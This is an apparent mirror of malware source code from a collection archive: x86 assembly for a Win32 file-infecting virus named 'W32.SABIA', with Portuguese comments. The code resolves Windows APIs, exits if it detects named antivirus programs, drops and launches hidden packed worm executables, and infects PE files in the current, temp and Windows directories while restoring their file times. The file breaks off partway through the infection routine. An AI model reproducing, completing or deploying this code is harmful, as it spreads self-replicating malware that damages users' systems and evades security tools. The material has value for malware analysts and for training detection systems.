mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-04 01:15:27 +00:00
1342 lines
23 KiB
NASM
1342 lines
23 KiB
NASM
|
|
|||
|
; W32.SABIA (beta)
|
|||
|
|
|||
|
|
|||
|
.386p
|
|||
|
.model flat
|
|||
|
.code
|
|||
|
jumps
|
|||
|
|
|||
|
include \VIRUS\TASM50\INCLUDE\SABIA.INC
|
|||
|
|
|||
|
DEBUG EQU TRUE ; TRUE = message box about infected files,
|
|||
|
; and will just copy the worms to the windows
|
|||
|
; folder (not install). Only GOAT*.* files are
|
|||
|
; infected.
|
|||
|
|
|||
|
; FALSE = no alert about the infection, infect all PE
|
|||
|
; files.
|
|||
|
; and will install the 2 worms (email and http).
|
|||
|
|
|||
|
|
|||
|
start:
|
|||
|
|
|||
|
pushf
|
|||
|
pushad
|
|||
|
|
|||
|
db 233
|
|||
|
maybe@001 dd 0
|
|||
|
|
|||
|
; achar os endere<72>os das api's (funciona em W95/98 ,NT e 2000)
|
|||
|
; o arquivo precisa ter importado a api GetProcAddress()
|
|||
|
|
|||
|
mov eax, 12345678h
|
|||
|
org $-4
|
|||
|
|
|||
|
; imagebase do arquivo (este valor mudar<61> de arquivo p/ arquivo)
|
|||
|
|
|||
|
img_base0 dd not 00400000h
|
|||
|
|
|||
|
api@001:
|
|||
|
|
|||
|
not eax
|
|||
|
call api@003
|
|||
|
mov esp, [esp+8]
|
|||
|
|
|||
|
saida@001:
|
|||
|
|
|||
|
pop dword ptr fs:[0]
|
|||
|
pop eax
|
|||
|
|
|||
|
saida@002:
|
|||
|
|
|||
|
popad
|
|||
|
popf
|
|||
|
|
|||
|
; o codigo real do arquivo (antes da infec<65><63>o)
|
|||
|
; no futuro vai ter encripta<74>ao, mas por enquanto
|
|||
|
; fica assim mesmo [aproveitem AV ;) ]
|
|||
|
|
|||
|
dw 25ffh
|
|||
|
chamada@001 dd offset sabia@memory
|
|||
|
|
|||
|
api@003:
|
|||
|
|
|||
|
push dword ptr fs:[0]
|
|||
|
mov fs:[0], esp
|
|||
|
|
|||
|
mov ecx, [eax+60]
|
|||
|
mov edx, [eax+ecx+52]
|
|||
|
cmp eax, edx
|
|||
|
jne saida@001
|
|||
|
|
|||
|
api@004:
|
|||
|
|
|||
|
mov ebp, edx
|
|||
|
add eax, ecx
|
|||
|
add eax, 128
|
|||
|
|
|||
|
; eax apontando p/ import table
|
|||
|
; ebp contem a imagebase
|
|||
|
|
|||
|
; a entrada da import table esta em esi
|
|||
|
|
|||
|
mov esi, [eax]
|
|||
|
add esi, ebp
|
|||
|
push esi
|
|||
|
|
|||
|
; o limite da import table esta em edi
|
|||
|
|
|||
|
mov edi, esi
|
|||
|
add edi, [eax+4]
|
|||
|
|
|||
|
; primeira entrada na import table
|
|||
|
|
|||
|
mov eax, 'NREK' xor 'NBK' + 'ANA'
|
|||
|
xor eax, 'NBK' + 'ANA'
|
|||
|
|
|||
|
api@007:
|
|||
|
|
|||
|
mov edx, [esi+12]
|
|||
|
cmp [edx+ebp], eax
|
|||
|
je api@006
|
|||
|
add esi, 20
|
|||
|
cmp edx, edi
|
|||
|
jb api@007
|
|||
|
pop esi
|
|||
|
jmp saida@001
|
|||
|
|
|||
|
; api's importadas pelo KERNEL achadas
|
|||
|
|
|||
|
api@006:
|
|||
|
|
|||
|
pop eax
|
|||
|
mov edx, [esi+16]
|
|||
|
add edx, ebp
|
|||
|
mov esi, [esi]
|
|||
|
add esi, ebp
|
|||
|
cmp eax, esi
|
|||
|
je saida@001
|
|||
|
mov ecx, edi
|
|||
|
|
|||
|
; ecx contem o numero de vezes para o loop
|
|||
|
|
|||
|
sub ecx, eax
|
|||
|
xor edi, edi
|
|||
|
|
|||
|
api@009:
|
|||
|
|
|||
|
cmp dword ptr [esi], 0
|
|||
|
je saida@001
|
|||
|
|
|||
|
; cmp byte ptr [esi+3], 128
|
|||
|
; je api@008
|
|||
|
lodsd
|
|||
|
add eax, ebp
|
|||
|
add eax, 2
|
|||
|
mov ebx, 'PteG' xor 'NBK' + 'ANA' + '<:-P'
|
|||
|
xor ebx, 'NBK' + 'ANA' + '<:-P'
|
|||
|
cmp [eax], ebx
|
|||
|
jne api@008
|
|||
|
xor ebx, 'PteG' xor 'Acor'
|
|||
|
cmp [eax+4], ebx
|
|||
|
jne api@008
|
|||
|
lea edi,[edi*4]
|
|||
|
add edi, edx
|
|||
|
|
|||
|
; pronto, GetProcAddress em [edi]
|
|||
|
; tentar primeiro o NT, depois W95 e depois W2000
|
|||
|
|
|||
|
call api@010
|
|||
|
|
|||
|
; Beep() <20> uma api presente em todos os sistemas e <20>
|
|||
|
; uma palavra bem pequena ;)
|
|||
|
|
|||
|
db 'Beep',0
|
|||
|
|
|||
|
api@010:
|
|||
|
|
|||
|
pop esi
|
|||
|
mov ebx, 077F00000h xor 'NBK' + 'ANA' + 'AUUA'
|
|||
|
xor ebx, 'NBK' + 'ANA' + 'AUUA'
|
|||
|
|
|||
|
call api@011
|
|||
|
jnz api@012
|
|||
|
xor ebx, 077F00000h xor 0BFF70000h
|
|||
|
|
|||
|
call api@011
|
|||
|
jnz api@012
|
|||
|
xor ebx, 0BFF70000h xor 077E0000h
|
|||
|
|
|||
|
call api@011
|
|||
|
jnz api@012
|
|||
|
|
|||
|
jmp saida@001
|
|||
|
|
|||
|
api@011:
|
|||
|
|
|||
|
push esi
|
|||
|
push ebx
|
|||
|
call [edi]
|
|||
|
test eax,eax
|
|||
|
ret
|
|||
|
|
|||
|
api@008:
|
|||
|
|
|||
|
inc edi
|
|||
|
dec ecx
|
|||
|
jecxz saida@001
|
|||
|
jmp api@009
|
|||
|
|
|||
|
api@012:
|
|||
|
|
|||
|
; KERNEL em ebx e GetProcAddress em [edi]
|
|||
|
|
|||
|
call api@014
|
|||
|
|
|||
|
dd 0,0,0
|
|||
|
|
|||
|
api@014:
|
|||
|
|
|||
|
pop eax
|
|||
|
push dword ptr [edi]
|
|||
|
pop dword ptr [eax]
|
|||
|
mov [eax+4], ebx
|
|||
|
mov [eax+8], ebp
|
|||
|
mov ebp, eax
|
|||
|
|
|||
|
call api@013
|
|||
|
|
|||
|
db 'FindFirstFileA',0
|
|||
|
db 'FindNextFileA',0
|
|||
|
db 'DeleteFileA',0
|
|||
|
db 'GetFileSize',0
|
|||
|
db 'SetFileAttributesA',0
|
|||
|
db 'GetCurrentDirectoryA',0
|
|||
|
db 'CreateFileMappingA',0
|
|||
|
db 'MapViewOfFile',0
|
|||
|
db 'UnmapViewOfFile',0
|
|||
|
db 'CreateFileA',0
|
|||
|
db 'CloseHandle',0
|
|||
|
db 'FindClose',0
|
|||
|
db 'GetDriveTypeA',0
|
|||
|
db 'CopyFileA',0
|
|||
|
db 'Sleep',0
|
|||
|
db 'GetWindowsDirectoryA',0
|
|||
|
db 'GetSystemDirectoryA',0
|
|||
|
db 'GetFileAttributesA',0
|
|||
|
db 'SetFilePointer',0
|
|||
|
db 'SetEndOfFile',0
|
|||
|
db 'GetSystemTime',0
|
|||
|
db 'lstrlen',0
|
|||
|
db 'lstrcat',0
|
|||
|
db 'VirtualAlloc',0
|
|||
|
db 'CreateMutexA',0
|
|||
|
db 'CreateThread',0
|
|||
|
db 'GetStartupInfoA',0
|
|||
|
db 'CreateProcessA',0
|
|||
|
db 'LoadLibraryA',0
|
|||
|
db 'GetProcAddress',0
|
|||
|
db 'GetFileTime',0
|
|||
|
db 'SetFileTime',0
|
|||
|
db 'GetTempPathA',0
|
|||
|
db 'lstrcpyA',0,'K'
|
|||
|
|
|||
|
api@013:
|
|||
|
|
|||
|
pop esi
|
|||
|
|
|||
|
call api@015
|
|||
|
|
|||
|
FindFirstFileA dd 0
|
|||
|
FindNextFileA dd 0
|
|||
|
DeleteFileA dd 0
|
|||
|
GetFileSize dd 0
|
|||
|
SetFileAttributesA dd 0
|
|||
|
GetCurrentDirectoryA dd 0
|
|||
|
CreateFileMappingA dd 0
|
|||
|
MapViewOfFile dd 0
|
|||
|
UnmapViewOfFile dd 0
|
|||
|
CreateFileA dd 0
|
|||
|
CloseHandle dd 0
|
|||
|
FindClose dd 0
|
|||
|
GetDriveTypeA dd 0
|
|||
|
CopyFileA dd 0
|
|||
|
Sleep dd 0
|
|||
|
GetWindowsDirectoryA dd 0
|
|||
|
GetSystemDirectoryA dd 0
|
|||
|
GetFileAttributesA dd 0
|
|||
|
SetFilePointer dd 0
|
|||
|
SetEndOfFile dd 0
|
|||
|
GetSystemTime dd 0
|
|||
|
lstrlen dd 0
|
|||
|
lstrcat dd 0
|
|||
|
VirtualAlloc dd 0
|
|||
|
CreateMutexA dd 0
|
|||
|
CreateThread dd 0
|
|||
|
GetStartupInfoA dd 0
|
|||
|
CreateProcessA dd 0
|
|||
|
LoadLibraryA dd 0
|
|||
|
GetProcAddressA dd 0
|
|||
|
GetFileTime dd 0
|
|||
|
SetFileTime dd 0
|
|||
|
GetTempPathA dd 0
|
|||
|
lstrcpy dd 0,0
|
|||
|
|
|||
|
api@015:
|
|||
|
|
|||
|
pop edi
|
|||
|
|
|||
|
api@017:
|
|||
|
|
|||
|
push esi
|
|||
|
push dword ptr [ebp+4]
|
|||
|
call [ebp]
|
|||
|
stosd
|
|||
|
test eax,eax
|
|||
|
jz saida@001
|
|||
|
|
|||
|
api@016:
|
|||
|
|
|||
|
lodsb
|
|||
|
test al,al
|
|||
|
jnz api@016
|
|||
|
lodsb
|
|||
|
dec esi
|
|||
|
cmp al, 'K'
|
|||
|
jne api@017
|
|||
|
|
|||
|
; acabamos de achar as api's
|
|||
|
|
|||
|
mov ebp, [ebp+8]
|
|||
|
mov ecx, (offset sabia@end - offset start)
|
|||
|
mov esi, 12345678h
|
|||
|
org $-4
|
|||
|
|
|||
|
; onde nosso virus come<6D>a na memoria
|
|||
|
|
|||
|
img_base1 dd 00401000h
|
|||
|
mov edi, esi
|
|||
|
push edi
|
|||
|
add edi, ecx
|
|||
|
rep movsb
|
|||
|
|
|||
|
; converter agora, os endere<72>os para RUNTIME,
|
|||
|
; nao mais usando o registrador EBP, como
|
|||
|
; <20> de costume nos virus WIN32.
|
|||
|
|
|||
|
pop eax
|
|||
|
lea edi, [(eax+(offset worm@001 - offset start))]
|
|||
|
mov ebx, not 00401000h
|
|||
|
not ebx
|
|||
|
mov ecx, offset sabia@memory
|
|||
|
|
|||
|
runtime@001:
|
|||
|
|
|||
|
dec edi
|
|||
|
cmp edi, eax
|
|||
|
je sabia@001
|
|||
|
cmp dword ptr [edi], ecx
|
|||
|
jae runtime@001
|
|||
|
cmp [edi], ebx
|
|||
|
jb runtime@001
|
|||
|
sub [edi], ebx
|
|||
|
add [edi], eax
|
|||
|
jmp short runtime@001
|
|||
|
|
|||
|
sabia@001:
|
|||
|
|
|||
|
mov eax, dword ptr [(offset sabia@end+(offset chamada@001 - offset start))]
|
|||
|
mov [chamada@001], eax
|
|||
|
mov [maybe@001], (offset saida@002 - (offset maybe@001+4))
|
|||
|
|
|||
|
; agora que nosso codigo foi convertido para endere<72>os
|
|||
|
; RUNTIME, podemos chamar tudo diretamente ;-P
|
|||
|
|
|||
|
; verificar se existe algum antivirus ativo na memoria
|
|||
|
|
|||
|
push offset user@001
|
|||
|
call [LoadLibraryA]
|
|||
|
|
|||
|
test eax, eax
|
|||
|
jz saida@001
|
|||
|
|
|||
|
mov [user@002], eax
|
|||
|
|
|||
|
push offset user@003
|
|||
|
push eax
|
|||
|
call [GetProcAddressA]
|
|||
|
|
|||
|
test eax, eax
|
|||
|
jz saida@001
|
|||
|
|
|||
|
mov edi, eax
|
|||
|
|
|||
|
test eax, eax
|
|||
|
jz saida@001
|
|||
|
|
|||
|
; array de nomes de antivirus
|
|||
|
|
|||
|
mov esi, offset anti@002
|
|||
|
mov ecx, [esi-4]
|
|||
|
|
|||
|
anti@005:
|
|||
|
|
|||
|
push ecx
|
|||
|
push dword ptr [esi]
|
|||
|
push 0
|
|||
|
call edi
|
|||
|
|
|||
|
pop ecx
|
|||
|
test eax, eax
|
|||
|
jnz saida@001
|
|||
|
|
|||
|
lodsd
|
|||
|
loop anti@005
|
|||
|
|
|||
|
push offset user@004
|
|||
|
push [user@002]
|
|||
|
call [GetProcAddressA]
|
|||
|
|
|||
|
test eax, eax
|
|||
|
jz saida@001
|
|||
|
|
|||
|
mov [user@005], eax
|
|||
|
|
|||
|
anti@001:
|
|||
|
|
|||
|
; achar diretorio do windows, copiar o codigo do WORM
|
|||
|
|
|||
|
push MAX_PATH
|
|||
|
mov edi, offset buffer@001
|
|||
|
push edi
|
|||
|
call [GetWindowsDirectoryA]
|
|||
|
|
|||
|
test eax,eax
|
|||
|
jz saida@001
|
|||
|
|
|||
|
add edi, eax
|
|||
|
|
|||
|
push offset buffer@001
|
|||
|
push offset buffer@004
|
|||
|
call [lstrcpy]
|
|||
|
|
|||
|
mov eax, '_EI\' xor 'NBK' + 'ANA' + 'TAAT'
|
|||
|
xor eax, 'NBK' + 'ANA' + 'TAAT'
|
|||
|
stosd
|
|||
|
xor eax, '_EI\' xor 'KCAP'
|
|||
|
stosd
|
|||
|
xor eax, 'KCAP' xor 'EXE.'
|
|||
|
stosd
|
|||
|
xor al, al
|
|||
|
stosb
|
|||
|
|
|||
|
mov esi, offset worm@001
|
|||
|
call depack@001
|
|||
|
|
|||
|
test eax, eax
|
|||
|
jz sabia@002
|
|||
|
|
|||
|
IF DEBUG EQ FALSE
|
|||
|
|
|||
|
call play@001
|
|||
|
|
|||
|
ELSE
|
|||
|
ENDIF
|
|||
|
|
|||
|
call HIDE@001
|
|||
|
|
|||
|
mov edi, offset buffer@004
|
|||
|
push edi
|
|||
|
call [lstrlen]
|
|||
|
|
|||
|
add edi, eax
|
|||
|
mov eax, 'NIW\' xor 'NBK' + 'ANA' + '<:O~'
|
|||
|
xor eax, 'NBK' + 'ANA' + '<:O~'
|
|||
|
stosd
|
|||
|
xor eax, 'NIW\' xor 'D.23'
|
|||
|
stosd
|
|||
|
xor eax, 'D.23' xor 'LL'
|
|||
|
stosd
|
|||
|
|
|||
|
push TRUE
|
|||
|
push offset buffer@004
|
|||
|
push offset buffer@001
|
|||
|
call [CopyFileA]
|
|||
|
|
|||
|
test eax, eax
|
|||
|
jz sabia@002
|
|||
|
|
|||
|
; devemos infectar a WIN32.DLL agora
|
|||
|
|
|||
|
push offset buffer@004
|
|||
|
push offset buffer@001
|
|||
|
call [lstrcpy]
|
|||
|
|
|||
|
test eax, eax
|
|||
|
jz sabia@002
|
|||
|
|
|||
|
mov eax, [handle@002]
|
|||
|
call infectar@001
|
|||
|
|
|||
|
call HIDE@001
|
|||
|
|
|||
|
sabia@002:
|
|||
|
|
|||
|
push MAX_PATH
|
|||
|
mov edi, offset buffer@001
|
|||
|
push edi
|
|||
|
call [GetWindowsDirectoryA]
|
|||
|
|
|||
|
add edi, eax
|
|||
|
mov eax, 'XTM\' xor 'NBK' + 'ANA' + '????'
|
|||
|
xor eax, 'NBK' + 'ANA' + '????'
|
|||
|
stosd
|
|||
|
xor eax, 'XTM\' xor 'XE._'
|
|||
|
stosd
|
|||
|
xor eax, 'XE._' xor 'E'
|
|||
|
stosd
|
|||
|
|
|||
|
mov esi, offset worm@002
|
|||
|
call depack@001
|
|||
|
|
|||
|
test eax, eax
|
|||
|
jz sabia@003
|
|||
|
|
|||
|
IF DEBUG EQ FALSE
|
|||
|
|
|||
|
call play@001
|
|||
|
|
|||
|
ELSE
|
|||
|
ENDIF
|
|||
|
|
|||
|
call HIDE@001
|
|||
|
|
|||
|
sabia@003:
|
|||
|
|
|||
|
mov edi, offset buffer@006
|
|||
|
push edi
|
|||
|
push MAX_PATH
|
|||
|
call [GetCurrentDirectoryA]
|
|||
|
|
|||
|
call sabia@008
|
|||
|
|
|||
|
mov edi, offset buffer@006
|
|||
|
push edi
|
|||
|
push MAX_PATH
|
|||
|
call [GetTempPathA]
|
|||
|
|
|||
|
call sabia@008
|
|||
|
|
|||
|
push MAX_PATH
|
|||
|
mov edi, offset buffer@006
|
|||
|
push edi
|
|||
|
call [GetWindowsDirectoryA]
|
|||
|
|
|||
|
call sabia@008
|
|||
|
|
|||
|
jmp saida@001
|
|||
|
|
|||
|
sabia@008:
|
|||
|
|
|||
|
add edi, eax
|
|||
|
cmp byte ptr [edi-1], '\'
|
|||
|
jne sabia@010
|
|||
|
dec edi
|
|||
|
|
|||
|
sabia@010:
|
|||
|
|
|||
|
IF DEBUG EQ FALSE
|
|||
|
|
|||
|
STR1 = '*.*\'
|
|||
|
STR2 = NULL
|
|||
|
STR3 = NULL
|
|||
|
|
|||
|
ELSE
|
|||
|
|
|||
|
STR1 = 'AOG\'
|
|||
|
STR2 = '*.*T'
|
|||
|
STR3 = NULL
|
|||
|
|
|||
|
ENDIF
|
|||
|
|
|||
|
mov eax, STR1
|
|||
|
stosd
|
|||
|
mov eax, STR2
|
|||
|
stosd
|
|||
|
mov eax, STR3
|
|||
|
stosd
|
|||
|
|
|||
|
push offset buffer@005
|
|||
|
push offset buffer@006
|
|||
|
call [FindFirstFileA]
|
|||
|
|
|||
|
mov [handle@007], eax
|
|||
|
inc eax
|
|||
|
jz sabia@011
|
|||
|
|
|||
|
sabia@006:
|
|||
|
|
|||
|
push offset buffer@006
|
|||
|
mov esi, offset buffer@001
|
|||
|
push esi
|
|||
|
call [lstrcpy]
|
|||
|
|
|||
|
push esi
|
|||
|
call [lstrlen]
|
|||
|
add esi, eax
|
|||
|
|
|||
|
sabia@009:
|
|||
|
|
|||
|
dec esi
|
|||
|
cmp byte ptr [esi], '\'
|
|||
|
jne sabia@009
|
|||
|
|
|||
|
mov edi, esi
|
|||
|
inc edi
|
|||
|
|
|||
|
mov esi, offset buffer@005.cFileName
|
|||
|
|
|||
|
sabia@007:
|
|||
|
|
|||
|
lodsb
|
|||
|
stosb
|
|||
|
test al, al
|
|||
|
jnz sabia@007
|
|||
|
|
|||
|
cmp byte ptr [buffer@005.cFileName], '.'
|
|||
|
je sabia@004
|
|||
|
|
|||
|
mov eax, [buffer@005.nFileSizeLow]
|
|||
|
|
|||
|
call infectar@001
|
|||
|
|
|||
|
test eax, eax
|
|||
|
jnz sabia@005
|
|||
|
|
|||
|
sabia@004:
|
|||
|
|
|||
|
push offset buffer@005
|
|||
|
push [handle@007]
|
|||
|
call [FindNextFileA]
|
|||
|
|
|||
|
test eax, eax
|
|||
|
jnz sabia@006
|
|||
|
|
|||
|
sabia@005:
|
|||
|
|
|||
|
push [handle@007]
|
|||
|
call [FindClose]
|
|||
|
|
|||
|
sabia@011:
|
|||
|
|
|||
|
ret
|
|||
|
|
|||
|
IO@001:
|
|||
|
|
|||
|
pushad
|
|||
|
mov [handle@002], 0
|
|||
|
push 0
|
|||
|
push 0
|
|||
|
push OPEN_EXISTING
|
|||
|
jmp short IO@003
|
|||
|
|
|||
|
IO@002:
|
|||
|
|
|||
|
pushad
|
|||
|
push 0
|
|||
|
push 0
|
|||
|
push CREATE_NEW
|
|||
|
|
|||
|
IO@003:
|
|||
|
|
|||
|
push offset buffer@001
|
|||
|
call [GetFileAttributesA]
|
|||
|
|
|||
|
mov [handle@008], eax
|
|||
|
inc eax
|
|||
|
jnz IO@005
|
|||
|
|
|||
|
mov [handle@008], FILE_ATTRIBUTE_NORMAL
|
|||
|
|
|||
|
IO@005:
|
|||
|
|
|||
|
push FILE_ATTRIBUTE_NORMAL
|
|||
|
push offset buffer@001
|
|||
|
call [SetFileAttributesA]
|
|||
|
|
|||
|
push 0
|
|||
|
push 1
|
|||
|
push GENERIC_READ or GENERIC_WRITE
|
|||
|
push offset buffer@001
|
|||
|
call [CreateFileA]
|
|||
|
|
|||
|
mov [handle@001], eax
|
|||
|
inc eax
|
|||
|
jz IOB@005
|
|||
|
|
|||
|
mov eax, offset handle@009
|
|||
|
push eax
|
|||
|
add eax, 8
|
|||
|
push eax
|
|||
|
add eax, 8
|
|||
|
push eax
|
|||
|
push [handle@001]
|
|||
|
call [GetFileTime]
|
|||
|
|
|||
|
push 0
|
|||
|
push [handle@001]
|
|||
|
call [GetFileSize]
|
|||
|
|
|||
|
cmp [handle@002], 0
|
|||
|
jne IO@004
|
|||
|
|
|||
|
mov [handle@002], eax
|
|||
|
|
|||
|
IO@004:
|
|||
|
|
|||
|
push 0
|
|||
|
push [handle@002]
|
|||
|
push 0
|
|||
|
push 4
|
|||
|
push 0
|
|||
|
push [handle@001]
|
|||
|
call [CreateFileMappingA]
|
|||
|
|
|||
|
mov [handle@003], eax
|
|||
|
|
|||
|
test eax,eax
|
|||
|
jz IOB@004
|
|||
|
|
|||
|
push [handle@002]
|
|||
|
push 0
|
|||
|
push 0
|
|||
|
push 2
|
|||
|
push [handle@003]
|
|||
|
call [MapViewOfFile]
|
|||
|
|
|||
|
mov [handle@004], eax
|
|||
|
|
|||
|
test eax,eax
|
|||
|
jz IOB@003
|
|||
|
|
|||
|
mov [esp+(4*7)], eax
|
|||
|
popad
|
|||
|
ret
|
|||
|
|
|||
|
IOB@001:
|
|||
|
|
|||
|
pushad
|
|||
|
|
|||
|
IOB@002:
|
|||
|
|
|||
|
push [handle@004]
|
|||
|
call [UnmapViewOfFile]
|
|||
|
|
|||
|
IOB@003:
|
|||
|
|
|||
|
push [handle@003]
|
|||
|
call [CloseHandle]
|
|||
|
|
|||
|
push 0
|
|||
|
push 0
|
|||
|
push [handle@002]
|
|||
|
push [handle@001]
|
|||
|
call [SetFilePointer]
|
|||
|
|
|||
|
push [handle@001]
|
|||
|
call [SetEndOfFile]
|
|||
|
|
|||
|
IOB@004:
|
|||
|
|
|||
|
mov eax, offset handle@009
|
|||
|
push eax
|
|||
|
add eax, 8
|
|||
|
push eax
|
|||
|
add eax, 8
|
|||
|
push eax
|
|||
|
push [handle@001]
|
|||
|
call [SetFileTime]
|
|||
|
|
|||
|
push [handle@001]
|
|||
|
call [CloseHandle]
|
|||
|
|
|||
|
IOB@005:
|
|||
|
|
|||
|
push [handle@008]
|
|||
|
push offset buffer@001
|
|||
|
call [SetFileAttributesA]
|
|||
|
|
|||
|
popad
|
|||
|
xor eax,eax
|
|||
|
ret
|
|||
|
|
|||
|
HIDE@001:
|
|||
|
|
|||
|
pushad
|
|||
|
push FILE_ATTRIBUTE_HIDDEN OR FILE_ATTRIBUTE_ARCHIVE
|
|||
|
push offset buffer@001
|
|||
|
call [SetFileAttributesA]
|
|||
|
popad
|
|||
|
ret
|
|||
|
|
|||
|
;***************************************************************
|
|||
|
;* aPLib v0.22b - the smaller the better :) *
|
|||
|
;* WASM & TASM assembler depacker *
|
|||
|
;* *
|
|||
|
;* Copyright (c) 1998-99 by - Jibz - All Rights Reserved *
|
|||
|
;***************************************************************
|
|||
|
|
|||
|
_aP_depack_asm:
|
|||
|
|
|||
|
push ebp
|
|||
|
mov ebp, esp
|
|||
|
pushad
|
|||
|
push ebp
|
|||
|
|
|||
|
mov esi, [ebp + 8] ; C calling convention
|
|||
|
mov edi, [ebp + 12]
|
|||
|
|
|||
|
cld
|
|||
|
mov dl, 80h
|
|||
|
|
|||
|
literal:
|
|||
|
|
|||
|
movsb
|
|||
|
|
|||
|
nexttag:
|
|||
|
|
|||
|
call getbit
|
|||
|
jnc literal
|
|||
|
|
|||
|
xor ecx, ecx
|
|||
|
call getbit
|
|||
|
jnc codepair
|
|||
|
xor eax, eax
|
|||
|
call getbit
|
|||
|
jnc shortmatch
|
|||
|
mov al, 10h
|
|||
|
|
|||
|
getmorebits:
|
|||
|
|
|||
|
call getbit
|
|||
|
adc al, al
|
|||
|
jnc getmorebits
|
|||
|
jnz domatch_with_inc
|
|||
|
stosb
|
|||
|
jmp short nexttag
|
|||
|
|
|||
|
codepair:
|
|||
|
|
|||
|
call getgamma_no_ecx
|
|||
|
dec ecx
|
|||
|
loop normalcodepair
|
|||
|
mov eax,ebp
|
|||
|
call getgamma
|
|||
|
jmp short domatch
|
|||
|
|
|||
|
shortmatch:
|
|||
|
|
|||
|
lodsb
|
|||
|
shr eax, 1
|
|||
|
jz donedepacking
|
|||
|
adc ecx, 2
|
|||
|
mov ebp, eax
|
|||
|
jmp short domatch
|
|||
|
|
|||
|
normalcodepair:
|
|||
|
|
|||
|
xchg eax, ecx
|
|||
|
dec eax
|
|||
|
shl eax, 8
|
|||
|
lodsb
|
|||
|
mov ebp, eax
|
|||
|
call getgamma
|
|||
|
cmp eax, 32000
|
|||
|
jae domatch_with_2inc
|
|||
|
cmp eax, 1280
|
|||
|
jae domatch_with_inc
|
|||
|
cmp eax, 7fh
|
|||
|
ja domatch
|
|||
|
|
|||
|
domatch_with_2inc:
|
|||
|
|
|||
|
inc ecx
|
|||
|
|
|||
|
domatch_with_inc:
|
|||
|
|
|||
|
inc ecx
|
|||
|
|
|||
|
domatch:
|
|||
|
|
|||
|
push esi
|
|||
|
mov esi, edi
|
|||
|
sub esi, eax
|
|||
|
rep movsb
|
|||
|
pop esi
|
|||
|
jmp short nexttag
|
|||
|
|
|||
|
getbit:
|
|||
|
|
|||
|
add dl, dl
|
|||
|
jnz stillbitsleft
|
|||
|
mov dl, [esi]
|
|||
|
inc esi
|
|||
|
adc dl, dl
|
|||
|
|
|||
|
stillbitsleft:
|
|||
|
|
|||
|
ret
|
|||
|
|
|||
|
getgamma:
|
|||
|
|
|||
|
xor ecx, ecx
|
|||
|
|
|||
|
getgamma_no_ecx:
|
|||
|
|
|||
|
inc ecx
|
|||
|
|
|||
|
getgammaloop:
|
|||
|
|
|||
|
call getbit
|
|||
|
adc ecx, ecx
|
|||
|
call getbit
|
|||
|
jc getgammaloop
|
|||
|
ret
|
|||
|
|
|||
|
donedepacking:
|
|||
|
|
|||
|
pop ebp
|
|||
|
sub edi, [ebp + 12]
|
|||
|
mov [ebp - 4], edi ; return unpacked length in eax
|
|||
|
|
|||
|
popad
|
|||
|
pop ebp
|
|||
|
ret
|
|||
|
|
|||
|
buffer@001 db MAX_PATH dup(0)
|
|||
|
name@001 db '_SABIA_',0
|
|||
|
dd 8
|
|||
|
anti@002 dd offset anti@003
|
|||
|
dd offset anti@004
|
|||
|
dd offset anti@006
|
|||
|
dd offset anti@007
|
|||
|
dd offset anti@008
|
|||
|
dd offset anti@009
|
|||
|
dd offset anti@010
|
|||
|
dd offset anti@011
|
|||
|
anti@003 db 'AntiViral Toolkit Pro',0
|
|||
|
anti@004 db 'AVP Monitor',0
|
|||
|
anti@006 db 'Vsstat',0
|
|||
|
anti@007 db 'Webscanx',0
|
|||
|
anti@008 db 'Avconsol',0
|
|||
|
anti@009 db 'McAfee VirusScan',0
|
|||
|
anti@010 db 'Vshwin32',0
|
|||
|
anti@011 db 'Central do McAfee VirusScan',0
|
|||
|
user@001 db 'USER32.DLL',0
|
|||
|
user@003 db 'FindWindowA',0
|
|||
|
user@004 db 'MessageBoxA',0
|
|||
|
aste@001 db '*.*',0
|
|||
|
|
|||
|
depack@001:
|
|||
|
|
|||
|
; buffer@001 tem o nome e o path completo do arquivo
|
|||
|
; esi tem o offset pro codigo compactado
|
|||
|
|
|||
|
; criar arquivo padrao de 16K
|
|||
|
|
|||
|
pushad
|
|||
|
mov [handle@002], (1024 * 16)
|
|||
|
call IO@002
|
|||
|
|
|||
|
test eax, eax
|
|||
|
jz depack@002
|
|||
|
|
|||
|
push eax
|
|||
|
push esi
|
|||
|
call _aP_depack_asm
|
|||
|
add esp, 8
|
|||
|
|
|||
|
; refazendo o tamanho original...
|
|||
|
|
|||
|
mov [handle@002], eax
|
|||
|
|
|||
|
call IOB@001
|
|||
|
|
|||
|
mov eax, [handle@002]
|
|||
|
|
|||
|
depack@002:
|
|||
|
|
|||
|
mov [esp+(4*7)], eax
|
|||
|
popad
|
|||
|
ret
|
|||
|
|
|||
|
play@001:
|
|||
|
|
|||
|
pushad
|
|||
|
push offset buffer@002
|
|||
|
call [GetStartupInfoA]
|
|||
|
|
|||
|
push offset buffer@003
|
|||
|
push offset buffer@002
|
|||
|
push 0
|
|||
|
push 0
|
|||
|
push 67108928h
|
|||
|
push 0
|
|||
|
push 0
|
|||
|
push 0
|
|||
|
push offset buffer@001
|
|||
|
push 0
|
|||
|
call [CreateProcessA]
|
|||
|
popad
|
|||
|
ret
|
|||
|
|
|||
|
infectar@001:
|
|||
|
|
|||
|
; tamanho do arquivo em eax
|
|||
|
; arquivos menores de 8Kb nao serao infectados
|
|||
|
|
|||
|
IF DEBUG EQ TRUE
|
|||
|
|
|||
|
pushad
|
|||
|
push 0
|
|||
|
call mena
|
|||
|
db 'Arquivo a ser infectado:',0
|
|||
|
mena:
|
|||
|
push offset buffer@001
|
|||
|
push 0
|
|||
|
call [user@005]
|
|||
|
popad
|
|||
|
|
|||
|
ELSE
|
|||
|
ENDIF
|
|||
|
|
|||
|
pushad
|
|||
|
mov dword ptr [esp+(4*7)], 0
|
|||
|
mov [handle@002], eax
|
|||
|
mov esi, offset buffer@001
|
|||
|
mov ebp, eax
|
|||
|
xor edx, edx
|
|||
|
mov ecx, 101
|
|||
|
cmp eax, ecx
|
|||
|
jbe infectar@002
|
|||
|
div ecx
|
|||
|
test edx, edx
|
|||
|
jz infectar@002
|
|||
|
|
|||
|
cmp ebp, 8192
|
|||
|
ja infectar@003
|
|||
|
|
|||
|
push esi
|
|||
|
push esi
|
|||
|
call [lstrlen]
|
|||
|
sub eax, 5
|
|||
|
add esi, eax
|
|||
|
lodsd
|
|||
|
pop esi
|
|||
|
xor eax, 'LD.2'
|
|||
|
jz infectar@003
|
|||
|
xor eax, 'LD.2' xor 'XE.2'
|
|||
|
jnz infectar@002
|
|||
|
|
|||
|
infectar@003:
|
|||
|
|
|||
|
; arquivo nao infectado, vamos tentar abri-lo
|
|||
|
|
|||
|
call IO@001
|
|||
|
|
|||
|
test eax, eax
|
|||
|
